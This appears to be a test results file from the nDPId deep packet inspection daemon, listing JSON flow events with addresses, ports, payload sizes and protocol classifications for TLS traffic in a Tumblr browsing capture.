-00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104013,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1605292102602,"flow_last_seen":1605292122470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":35234,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292114506,"flow_last_seen":1605292114736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292114506,"flow_last_seen":1605292114736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102219,"flow_last_seen":1605292102653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102219,"flow_last_seen":1605292102653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605292105433,"flow_last_seen":1605292106000,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7251,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"}} -00680{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605292121674,"flow_last_seen":1605292122517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605292121674,"flow_last_seen":1605292122517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102603,"flow_last_seen":1605292102678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102603,"flow_last_seen":1605292102678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49462,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49462,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49464,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49464,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49496,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49496,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605292122064,"flow_last_seen":1605292122440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6040,"flow_tot_l4_payload_len":76219,"flow_avg_l4_payload_len":712,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605292104650,"flow_last_seen":1605292122733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605292104650,"flow_last_seen":1605292122733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292119370,"flow_last_seen":1605292119458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292119370,"flow_last_seen":1605292119458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":21017,"flow_first_seen":1605292105669,"flow_last_seen":1605292122890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2772,"flow_tot_l4_payload_len":20045142,"flow_avg_l4_payload_len":953,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57788,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1671,"flow_first_seen":1605292108895,"flow_last_seen":1605292115212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2426,"flow_tot_l4_payload_len":1035742,"flow_avg_l4_payload_len":619,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"}} -00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122698,"flow_last_seen":1605292122741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292122698,"flow_last_seen":1605292122741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45706,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45706,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 